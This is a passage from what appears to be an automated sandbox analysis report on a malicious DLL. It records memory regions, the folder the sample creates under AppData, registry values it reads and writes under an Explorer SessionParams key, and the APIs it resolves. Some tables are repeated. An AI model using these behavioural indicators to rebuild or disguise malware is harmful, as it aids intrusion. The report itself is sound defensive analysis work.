| ole32.dll | 0x77970000 | 0x77acbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x77ad0000 | 0x77b98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x77ba0000 | 0x77c6bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x77c80000 | 0x77ccdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x77e80000 | 0x77e80fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77ec0000 | 0x77ffbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | Readable, Writable |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\win.com | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\system32\kernel32.dll | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP | - |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP\system32\ | - |
|
1 | |
| Get Info | C:\Windows\system32\win.com | type = time |
|
1 | |
| Get Info | C:\Windows\system32\kernel32.dll | type = time |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 |
Registry (32)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | - |
|
1 | |
| Create Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | - |
|
6 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = Timout, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = IsActive, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = BSlp, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = SDCnt, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = LastValue, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = Id, type = REG_BINARY |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = StVal, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = EmtParam, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = HtParam, data = 3600, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = CMValue, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = ILevelCount, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = IListLen, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = IList, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = Installed, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = IPlace, type = REG_BINARY |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = ISFValue, type = REG_BINARY |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = LastId, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = NTries, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = IMValue, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = LCValue, data = 0, type = REG_NONE |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = HtParam, data = 7200, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = StVal, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = CMValue, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = ILevelCount, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = IPlace, size = 100, type = REG_BINARY |
|
1 |
Module (101)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | kernel32.dll | base_address = 0x761d0000 |
|
2 | |
| Load | ws2_32.dll | base_address = 0x77510000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x76700000 |
|
1 | |
| Load | msvcrt.dll | base_address = 0x77720000 |
|
1 | |
| Load | user32.dll | base_address = 0x77ad0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x761d0000 |
|
12 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Windows\System32\goRcteXxZX.exe, size = 260 |
|
6 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Users\EEBsYm5\Desktop\97328F~1.DLL, size = 260 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsAlloc, address_out = 0x7622418d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x76221e16 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x762276e6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x76221f61 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EncodePointer, address_out = 0x77f1a295 |
|
8 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DecodePointer, address_out = 0x77f1cd10 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x762276b5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcAddress, address_out = 0x762233d3 |
|
2 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSAStartup, address_out = 0x77513ab2 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSACleanup, address_out = 0x77513c5f |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = gethostbyname, address_out = 0x77527673 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = inet_ntoa, address_out = 0x7751b131 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileA, address_out = 0x7621cee8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WriteFile, address_out = 0x76221400 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x7621ca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindFirstFileA, address_out = 0x76222d89 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindNextFileA, address_out = 0x7621a187 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindClose, address_out = 0x76220e62 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DeleteFileA, address_out = 0x762147cb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FileTimeToSystemTime, address_out = 0x76221dfe |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFilePointer, address_out = 0x7621db36 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateProcessA, address_out = 0x761d2082 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForSingleObject, address_out = 0x7621ba90 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReadFile, address_out = 0x762196fb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventW, address_out = 0x76223386 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemDirectoryA, address_out = 0x76218fc5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetWindowsDirectoryW, address_out = 0x762104b6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathA, address_out = 0x76236a65 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathW, address_out = 0x76208b33 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocalTime, address_out = 0x7621a90e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameW, address_out = 0x762103ff |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemInfo, address_out = 0x76223728 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetVersionExW, address_out = 0x76213b1a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetEnvironmentVariableA, address_out = 0x7621ce2e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileA, address_out = 0x7623532c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLastError, address_out = 0x7621bf00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileAttributesA, address_out = 0x76208cb9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileSize, address_out = 0x76210273 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateDirectoryA, address_out = 0x762368da |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TerminateProcess, address_out = 0x76212331 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryW, address_out = 0x76223c01 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryA, address_out = 0x7622395c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = MultiByteToWideChar, address_out = 0x7622452b |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCreateKeyExA, address_out = 0x76711469 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegEnumValueA, address_out = 0x7670cf49 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegDeleteValueA, address_out = 0x7672a4ea |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCloseKey, address_out = 0x7671469d |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memset, address_out = 0x77729790 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcpy, address_out = 0x77729910 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcmp, address_out = 0x77737975 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = malloc, address_out = 0x77729cee |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = free, address_out = 0x77729894 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strchr, address_out = 0x7772dbeb |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncpy, address_out = 0x777308a9 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = atoi, address_out = 0x7772dbe0 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snwprintf, address_out = 0x777495d1 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncat, address_out = 0x77750909 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strstr, address_out = 0x7772de4a |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strlen, address_out = 0x777343d3 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strrchr, address_out = 0x7772dbae |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snprintf, address_out = 0x7774fa7c |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = OemToCharA, address_out = 0x77b2f041 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfA, address_out = 0x77ae3f47 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfW, address_out = 0x77af426d |
|
1 |
System (5)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-04-29 13:06:28 (UTC) |
|
2 | |
| Get Time | type = Ticks, time = 97734 |
|
1 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
2 |
Environment (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 | |
| Get Environment String | name = APPDATA, result_out = C:\Users\EEBsYm5\AppData\Roaming |
|
2 |
Process #52: gorctexxzx.exe
118
0
| Information | Value |
|---|---|
| ID | #52 |
| File Name | c:\windows\system32\gorctexxzx.exe |
| Command Line | "C:\Windows\System32\goRcteXxZX.exe" /dll="C:\Users\EEBsYm5\Desktop\97328F~1.DLL" /fn_id=DllCanUnloadNow /fn_args="explorer.exe" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:34, Reason: Child Process |
| Unmonitor | End Time: 00:02:29, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:55 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xcec |
| Parent PID | 0xa3c (c:\windows\system32\gorctexxzx.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | CRH2YWU7\EEBsYm5 |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
CF0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x0012ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000130000 | 0x00130000 | 0x00133fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000140000 | 0x00140000 | 0x00140fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x00150000 | 0x001b6fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000250000 | 0x00250000 | 0x0025ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000002e0000 | 0x002e0000 | 0x003dffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000003e0000 | 0x003e0000 | 0x004a7fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000004b0000 | 0x004b0000 | 0x005b0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000005c0000 | 0x005c0000 | 0x011bffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| gorctexxzx.exe | 0x011d0000 | 0x011f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000001200000 | 0x01200000 | 0x0132ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001330000 | 0x01330000 | 0x014fffff | Private Memory | Readable, Writable |
|
|
|
- |
| api-ms-win-core-synch-l1-2-0.dll | 0x72db0000 | 0x72db2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| 97328f~1.dll | 0x72ee0000 | 0x72f24fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x75f70000 | 0x75fb9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x761d0000 | 0x762a3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x762b0000 | 0x762cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x762d0000 | 0x762d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x762e0000 | 0x762f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x76300000 | 0x76356fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x765f0000 | 0x765f9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x76700000 | 0x7679ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x767a0000 | 0x773e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x773f0000 | 0x7748cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x77510000 | 0x77544fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x77550000 | 0x775f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x77720000 | 0x777cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x77970000 | 0x77acbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x77ad0000 | 0x77b98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x77ba0000 | 0x77c6bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x77c80000 | 0x77ccdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x77e80000 | 0x77e80fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77ec0000 | 0x77ffbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | Readable, Writable |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\win.com | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\system32\kernel32.dll | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP | - |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP\system32\ | - |
|
1 | |
| Get Info | C:\Windows\system32\win.com | type = time |
|
1 | |
| Get Info | C:\Windows\system32\kernel32.dll | type = time |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 |
Module (101)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | kernel32.dll | base_address = 0x761d0000 |
|
2 | |
| Load | ws2_32.dll | base_address = 0x77510000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x76700000 |
|
1 | |
| Load | msvcrt.dll | base_address = 0x77720000 |
|
1 | |
| Load | user32.dll | base_address = 0x77ad0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x761d0000 |
|
12 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Windows\System32\goRcteXxZX.exe, size = 260 |
|
6 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Users\EEBsYm5\Desktop\97328F~1.DLL, size = 260 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsAlloc, address_out = 0x7622418d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x76221e16 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x762276e6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x76221f61 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EncodePointer, address_out = 0x77f1a295 |
|
8 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DecodePointer, address_out = 0x77f1cd10 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x762276b5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcAddress, address_out = 0x762233d3 |
|
2 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSAStartup, address_out = 0x77513ab2 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSACleanup, address_out = 0x77513c5f |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = gethostbyname, address_out = 0x77527673 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = inet_ntoa, address_out = 0x7751b131 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileA, address_out = 0x7621cee8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WriteFile, address_out = 0x76221400 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x7621ca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindFirstFileA, address_out = 0x76222d89 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindNextFileA, address_out = 0x7621a187 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindClose, address_out = 0x76220e62 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DeleteFileA, address_out = 0x762147cb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FileTimeToSystemTime, address_out = 0x76221dfe |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFilePointer, address_out = 0x7621db36 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateProcessA, address_out = 0x761d2082 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForSingleObject, address_out = 0x7621ba90 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReadFile, address_out = 0x762196fb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventW, address_out = 0x76223386 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemDirectoryA, address_out = 0x76218fc5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetWindowsDirectoryW, address_out = 0x762104b6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathA, address_out = 0x76236a65 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathW, address_out = 0x76208b33 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocalTime, address_out = 0x7621a90e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameW, address_out = 0x762103ff |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemInfo, address_out = 0x76223728 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetVersionExW, address_out = 0x76213b1a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetEnvironmentVariableA, address_out = 0x7621ce2e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileA, address_out = 0x7623532c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLastError, address_out = 0x7621bf00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileAttributesA, address_out = 0x76208cb9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileSize, address_out = 0x76210273 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateDirectoryA, address_out = 0x762368da |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TerminateProcess, address_out = 0x76212331 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryW, address_out = 0x76223c01 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryA, address_out = 0x7622395c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = MultiByteToWideChar, address_out = 0x7622452b |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCreateKeyExA, address_out = 0x76711469 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegEnumValueA, address_out = 0x7670cf49 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegDeleteValueA, address_out = 0x7672a4ea |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCloseKey, address_out = 0x7671469d |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memset, address_out = 0x77729790 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcpy, address_out = 0x77729910 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcmp, address_out = 0x77737975 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = malloc, address_out = 0x77729cee |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = free, address_out = 0x77729894 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strchr, address_out = 0x7772dbeb |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncpy, address_out = 0x777308a9 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = atoi, address_out = 0x7772dbe0 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snwprintf, address_out = 0x777495d1 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncat, address_out = 0x77750909 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strstr, address_out = 0x7772de4a |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strlen, address_out = 0x777343d3 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strrchr, address_out = 0x7772dbae |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snprintf, address_out = 0x7774fa7c |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = OemToCharA, address_out = 0x77b2f041 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfA, address_out = 0x77ae3f47 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfW, address_out = 0x77af426d |
|
1 |
System (5)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-04-29 13:06:28 (UTC) |
|
2 | |
| Get Time | type = Ticks, time = 97797 |
|
1 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
2 |
Environment (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 | |
